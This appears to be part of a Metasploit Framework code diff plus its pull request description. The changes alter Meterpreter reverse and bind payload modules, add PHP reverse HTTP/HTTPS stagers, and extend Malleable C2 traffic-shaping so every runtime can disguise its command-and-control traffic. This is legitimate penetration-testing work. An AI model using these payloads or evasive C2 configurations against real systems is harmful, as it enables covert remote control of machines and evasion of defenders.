     config = Rex::Payloads::Meterpreter::Config.new(config_opts)
 
     # return the binary version of it
-    config.to_b
+    "\x00" * 8 + config.to_b
   end
 end

--- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
@@ -49,6 +49,7 @@ module MetasploitModule
       uuid: opts[:uuid],
       transports: [transport_config_bind_tcp(opts)],
       extensions: (datastore['EXTENSIONS'] || '').split(','),
+      ext_format: 'x86.dll',
       ext_init: datastore['EXTINIT'] || '',
       stageless: true
     }.merge(meterpreter_logging_config(opts))

--- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
@@ -65,6 +65,6 @@ module MetasploitModule
     config = Rex::Payloads::Meterpreter::Config.new(config_opts)
 
     # return the binary version of it
-    config.to_b
+    "\x00" * 8 + config.to_b
   end
 end

--- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
@@ -56,6 +56,7 @@ module MetasploitModule
       uuid: opts[:uuid],
       transports: [transport_config_reverse_http(opts)],
       extensions: (datastore['EXTENSIONS'] || '').split(','),
+      ext_format: 'x86.dll',
       ext_init: datastore['EXTINIT'] || '',
       stageless: true
     }.merge(meterpreter_logging_config(opts))

--- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
@@ -65,6 +65,6 @@ module MetasploitModule
     config = Rex::Payloads::Meterpreter::Config.new(config_opts)
 
     # return the binary version of it
-    config.to_b
+    "\x00" * 8 + config.to_b
   end
 end

--- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
@@ -56,6 +56,7 @@ module MetasploitModule
       uuid: opts[:uuid],
       transports: [transport_config_reverse_https(opts)],
       extensions: (datastore['EXTENSIONS'] || '').split(','),
+      ext_format: 'x86.dll',
       ext_init: datastore['EXTINIT'] || '',
       stageless: true
     }.merge(meterpreter_logging_config(opts))

--- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
@@ -59,6 +59,6 @@ module MetasploitModule
     config = Rex::Payloads::Meterpreter::Config.new(config_opts)
 
     # return the binary version of it
-    config.to_b
+    "\x00" * 8 + config.to_b
   end
 end

--- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
@@ -50,6 +50,7 @@ module MetasploitModule
       uuid: opts[:uuid],
       transports: [transport_config_reverse_ipv6_tcp(opts)],
       extensions: (datastore['EXTENSIONS'] || '').split(','),
+      ext_format: 'x86.dll',
       ext_init: datastore['EXTINIT'] || '',
       stageless: true
     }.merge(meterpreter_logging_config(opts))

--- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
@@ -58,6 +58,6 @@ module MetasploitModule
     config = Rex::Payloads::Meterpreter::Config.new(config_opts)
 
     # return the binary version of it
-    config.to_b
+    "\x00" * 8 + config.to_b
   end
 end

--- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
@@ -49,6 +49,7 @@ module MetasploitModule
       uuid: opts[:uuid],
       transports: [transport_config_reverse_tcp(opts)],
       extensions: (datastore['EXTENSIONS'] || '').split(','),
+      ext_format: 'x86.dll',
       ext_init: datastore['EXTINIT'] || '',
       stageless: true
     }.merge(meterpreter_logging_config(opts))

--- a/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb
@@ -58,6 +58,6 @@ module MetasploitModule
     config = Rex::Payloads::Meterpreter::Config.new(config_opts)
 
     # return the binary version of it
-    config.to_b
+    "\x00" * 8 + config.to_b
   end
 end

--- a/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb
@@ -49,6 +49,7 @@ module MetasploitModule
       uuid: opts[:uuid],
       transports: [transport_config_bind_named_pipe(opts)],
       extensions: (datastore['EXTENSIONS'] || '').split(','),
+      ext_format: 'x64.dll',
       ext_init: datastore['EXTINIT'] || '',
       stageless: true
     }.merge(meterpreter_logging_config(opts))

--- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
@@ -58,6 +58,6 @@ module MetasploitModule
     config = Rex::Payloads::Meterpreter::Config.new(config_opts)
 
     # return the binary version of it
-    config.to_b
+    "\x00" * 8 + config.to_b
   end
 end

--- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
@@ -49,6 +49,7 @@ module MetasploitModule
       uuid: opts[:uuid],
       transports: [transport_config_bind_tcp(opts)],
       extensions: (datastore['EXTENSIONS'] || '').split(','),
+      ext_format: 'x64.dll',
       ext_init: datastore['EXTINIT'] || '',
       stageless: true
     }.merge(meterpreter_logging_config(opts))

--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
@@ -65,6 +65,6 @@ module MetasploitModule
     config = Rex::Payloads::Meterpreter::Config.new(config_opts)
 
     # return the binary version of it
-    config.to_b
+    "\x00" * 8 + config.to_b
   end
 end

--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
@@ -56,6 +56,7 @@ module MetasploitModule
       uuid: opts[:uuid],
       transports: [transport_config_reverse_http(opts)],
       extensions: (datastore['EXTENSIONS'] || '').split(','),
+      ext_format: 'x64.dll',
       ext_init: datastore['EXTINIT'] || '',
       stageless: true
     }.merge(meterpreter_logging_config(opts))

--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
@@ -56,6 +56,7 @@ module MetasploitModule
       uuid: opts[:uuid],
       transports: [transport_config_reverse_https(opts)],
       extensions: (datastore['EXTENSIONS'] || '').split(','),
+      ext_format: 'x64.dll',
       ext_init: datastore['EXTINIT'] || '',
       stageless: true
     }.merge(meterpreter_logging_config(opts))

--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
@@ -65,6 +65,6 @@ module MetasploitModule
     config = Rex::Payloads::Meterpreter::Config.new(config_opts)
 
     # return the binary version of it
-    config.to_b
+    "\x00" * 8 + config.to_b
   end
 end

--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
@@ -59,6 +59,6 @@ module MetasploitModule
     config = Rex::Payloads::Meterpreter::Config.new(config_opts)
 
     # return the binary version of it
-    config.to_b
+    "\x00" * 8 + config.to_b
   end
 end

--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
@@ -50,6 +50,7 @@ module MetasploitModule
       uuid: opts[:uuid],
       transports: [transport_config_reverse_ipv6_tcp(opts)],
       extensions: (datastore['EXTENSIONS'] || '').split(','),
+      ext_format: 'x64.dll',
       ext_init: datastore['EXTINIT'] || '',
       stageless: true
     }.merge(meterpreter_logging_config(opts))

--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
@@ -58,6 +58,6 @@ module MetasploitModule
     config = Rex::Payloads::Meterpreter::Config.new(config_opts)
 
     # return the binary version of it
-    config.to_b
+    "\x00" * 8 + config.to_b
   end
 end

--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
@@ -49,6 +49,7 @@ module MetasploitModule
       uuid: opts[:uuid],
       transports: [transport_config_reverse_tcp(opts)],
       extensions: (datastore['EXTENSIONS'] || '').split(','),
+      ext_format: 'x64.dll',
       ext_init: datastore['EXTINIT'] || '',
       stageless: true
     }.merge(meterpreter_logging_config(opts))

--- a/modules/payloads/stagers/php/reverse_http.rb
+++ b/modules/payloads/stagers/php/reverse_http.rb
@@ -1,0 +1,27 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  CachedSize = :dynamic
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Php::ReverseHttp
+
+  def initialize(info = {})
+    super(
+      merge_info(
+        info,
+        'Name' => 'PHP Reverse HTTP Stager',
+        'Description' => 'Tunnel communication over HTTP',
+        'Author' => 'OJ Reeves',
+        'License' => MSF_LICENSE,
+        'Platform' => 'php',
+        'Arch' => ARCH_PHP,
+        'Handler' => Msf::Handler::ReverseHttp,
+        'Stager' => { 'Payload' => '' }
+      )
+    )
+  end
+end

--- a/modules/payloads/stagers/php/reverse_https.rb
+++ b/modules/payloads/stagers/php/reverse_https.rb
@@ -1,0 +1,31 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  CachedSize = :dynamic
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Php::ReverseHttp
+
+  def initialize(info = {})
+    super(
+      merge_info(
+        info,
+        'Name' => 'PHP Reverse HTTPS Stager',
+        'Description' => 'Tunnel communication over HTTPS',
+        'Author' => 'OJ Reeves',
+        'License' => MSF_LICENSE,
+        'Platform' => 'php',
+        'Arch' => ARCH_PHP,
+        'Handler' => Msf::Handler::ReverseHttps,
+        'Stager' => { 'Payload' => '' }
+      )
+    )
+  end
+
+  def generate(_opts = {})
+    super({ scheme: 'https' })
+  end
+end

--- a/modules/payloads/stages/php/meterpreter.rb
+++ b/modules/payloads/stages/php/meterpreter.rb
@@ -3,9 +3,9 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'securerandom'
-
 module MetasploitModule
+  include Msf::Payload::TransportConfig
+  include Msf::Payload::UUID::Options
   include Msf::Sessions::MeterpreterOptions::Php
 
   def initialize(info = {})
@@ -23,16 +23,47 @@ module MetasploitModule
     )
   end
 
+  def generate_config(opts = {})
+    ds = opts[:datastore] || datastore
+    opts[:uuid] ||= generate_payload_uuid
+
+    unless opts[:transport_config]
+      scheme = opts[:scheme] || 'tcp'
+      if scheme == 'https'
+        opts[:transport_config] = [transport_config_reverse_https(opts)]
+      elsif scheme == 'http'
+        opts[:transport_config] = [transport_config_reverse_http(opts)]
+      else
+        opts[:transport_config] = [transport_config_reverse_tcp(opts)]
+      end
+    end
+
+    config_opts = {
+      ascii_str:         true,
+      null_session_guid: opts[:stageless] == true,
+      expiration:        (ds[:expiration] || ds['SessionExpirationTimeout']).to_i,
+      uuid:              opts[:uuid],
+      transports:        opts[:transport_config],
+      stageless:         opts[:stageless] == true,
+    }.merge(meterpreter_logging_config(opts))
+
+    config = Rex::Payloads::Meterpreter::Config.new(config_opts)
+    config.to_b
+  end
+
   def generate_stage(opts = {})
     met = MetasploitPayloads.read('meterpreter', 'meterpreter.php')
 
-    uuid = opts[:uuid] || generate_payload_uuid
-    bytes = uuid.to_raw.chars.map { |c| '\x%.2x' % c.ord }.join('')
-    met = met.sub('"PAYLOAD_UUID", ""', "\"PAYLOAD_UUID\", \"#{bytes}\"")
+    # Build the URI from the callback URL if present
+    unless opts[:url].to_s == ''
+      opts[:scheme] ||= opts[:url].to_s.split(':')[0]
+      uri = "/#{opts[:url].split('/').reject(&:empty?)[-1]}"
+      opts[:uri] = "#{luri}#{uri}"
+    end
 
-    # Staged payloads need to have a new session GUID
-    session_guid = [SecureRandom.uuid.gsub(/-/, '')].pack('H*').chars.map { |c| '\x%.2x' % c.ord }.join('')
-    met = met.sub(%q{"SESSION_GUID", ""}, %("SESSION_GUID", "#{session_guid}"))
+    # Generate the TLV config block containing all transport configuration
+    config_block = Rex::Text.encode_base64(generate_config(opts))
+    met = met.sub('"CONFIG_BLOCK", ""', "\"CONFIG_BLOCK\", \"#{config_block}\"")
 
     if datastore['MeterpreterDebugBuild']
       met.sub!(%q{define("MY_DEBUGGING", false);}, %|define("MY_DEBUGGING", true);|)
@@ -42,7 +73,6 @@ module MetasploitModule
     end
 
     met.gsub!(/#.*?$/, '')
-    # met = Rex::Text.compress(met)
     met
   end
 end


### PR DESCRIPTION
# Malleable C2 for all meterpreter runtimes (PHP/Python/Java/Mettle/Windows)

Builds on [this previous PR](https://github.com/rapid7/metasploit-framework/pull/20419) to bring full MC2 + stageless feature parity to every meterpreter, plus a few fixes the wider work uncovered.

## What's in here

### MC2 wiring for non-Windows meterpreters
Mettle, PHP, Python, and Java now honour a Malleable C2 profile end-to-end:

- Per-verb `set uri "/foo"` overrides LURI for that verb's requests; the framework registers each profile URI alongside LURI in `all_uris` so requests land on the right handler.
- `client.metadata` / `client.id` placement (`parameter`, `header`, `cookie`, default path-append) emit `TLV_TYPE_C2_UUID_GET/HEADER/COOKIE` so payloads place the UUID where the profile says.
- `prepend`, `base64`/`base64url`, and `append` directives on those placements work — the framework emits `TLV_TYPE_C2_ENC_UUID` + `TLV_TYPE_C2_UUID_PREFIX` + `TLV_TYPE_C2_UUID_SUFFIX`; each payload wraps the UUID accordingly; the handler reverses it.


### Inbound vs outbound encoding split
`TLV_TYPE_C2_ENC` split into three independent settings — all carried in both `TLV_TYPE_C2_GET` and `TLV_TYPE_C2_POST` groups:

| TLV | Direction | Sourced from |
|---|---|---|
| `TLV_TYPE_C2_ENC_INBOUND` | server → client body decode | `server { output { base64\|base64url } }` |
| `TLV_TYPE_C2_ENC_OUTBOUND` | client → server body encode | `client { output { base64\|base64url } }` (POST only) |
| `TLV_TYPE_C2_ENC_UUID` | UUID placement encoding | `client { metadata\|id { base64\|base64url } }` |

Plus `TLV_TYPE_C2_UUID_PREFIX/SUFFIX` for the `prepend`/`append` directives on those placement sections.

Old `TLV_TYPE_C2_ENC` is gone; staged C-meterpreter, mettle, java, php, python, framework all use the split. `TLV_TYPE_TRANS_*` were unused and removed — the python extension's `transport.py` is stubbed with `NotImplementedError` pending a rewrite onto the C2 TLVs, this might be removed entirely as it's probably not a feature that anyone uses anyway.

### UUID handling consistency
All four runtimes now follow the same pattern (matching `metsrv generate_uri`):

- `TLV_TYPE_C2_UUID` carries the current connection's UUID (set initially via `generate_uri_uuid(URI_CHECKSUM_INIT_CONN, uuid)` in `config.rb`).
- `COMMAND_ID_CORE_PATCH_UUID` (renamed from `_PATCH_URL`) updates the in-memory UUID without mutating the base URL.
- Each request rebuilds the URL from `scheme://host:port` + profile uri + current rendered UUID.
- For non-MC2 mode, the LURI path is preserved.

### Java stageless overhaul
- Single Java meterpreter modules now produce a self-contained jar (`Main-Class: StagelessMain`, full meterpreter + `JarFileClassLoader` + config-block resource embedded). `msfvenom -f jar` now routes through the modules' `generate_jar` override rather than the inherited stager-jar path.
- `loadExtension` works under either bootstrap mode — lazily creates a `JarFileClassLoader` (and reuses it across loads) when the JVM-supplied AppClassLoader is in play.

### Stageless `EXTENSIONS=` support
Every stageless single (Python/PHP/Java/Mettle, plus the existing Windows path) now bakes the listed extensions into the config block and hot-loads them before the C2 dispatch loop starts. The framework picks the right on-disk format via a new `:ext_format` opt (`'x86.dll'`/`'x64.dll'`/`'jar'`/`'py'`/`'php'`/`'bin'`) so non-Windows extensions skip the RDI prep and are shipped as-is (with the gem's encrypted-payload short-circuit honoured for everything that has one).

Mettle's 8 KB config-block reservation can't hold real extensions; that's now caught at generation time with a clear error pointing the user at runtime `load <ext>` instead. `EXTENSIONS=stdapi` is a no-op for mettle (stdapi is already linked into `mettle.bin`).

### Misc fixes / refactors found along the way
- `reverse_http.rb#request_summary` now logs `req.resource` (full request URI) instead of `luri` — much more useful when MC2 routes hit `/<profile-uri>/<uuid>` mount points.
- `reverse_http.rb#find_resource_id` rewritten to derive the candidate UUID from either query parameter, header, or path segment, then reverse profile-side `prepend`/`append` + base64 before handing it to `process_uri_resource`. Conservative: returns the candidate untouched if a declared wrapper isn't present (instead of mangling and feeding garbage downstream).

## Validated end-to-end

| runtime | MC2 (body + UUID transforms) | stageless `EXTENSIONS=` |
|---|---|---|
| PHP | ✔ | ✔ (e.g. `stdapi`) |
| Python | ✔ | ✔ |
| Java | ✔ | ✔ |
| Mettle (x86/x64 linux) | ✔ | warn-and-skip for things baked into the binary; honest error when the config block would overflow |
| Windows native (x86/x64) | unchanged | ✔ (existing path, now using `:ext_format`) |

## Notes for review

- Other linux mettle archs (aarch64, arm*, mips*, ppc*, zarch) got the same module-side wiring as x86/x64 but I couldn't physically test them.
- [`metasploit-payloads`](https://github.com/rapid7/metasploit-payloads/pull/801) and [`mettle`](https://github.com/rapid7/mettle/pull/294) repos both have matching pull requests.

## Testing

In short, for PHP, Python, Windows, Mettle and Java:
* Load every combination of reverse http/https/tcp, bind tcp staged and make sure they work with the usual configurations.
* Load every combination of stageless payload and make sure they work as expected, including with loading extra extensions.
* Load every combination of stageless payload and use `MALLEABLEC2` to use a C2 profile file (like [this](https://github.com/BC-SECURITY/Malleable-C2-Profiles/blob/master/APT/meterpreter.profile)).

Build and run the payloads with the correct associated handlers. Good luck. Goodspeed. The testing matrix here is huge.

*NOTE*: I have not been able to test Android Meterpreter, so I will need help with this one.

*NOTE*: Merge is targeting `6.5` branch.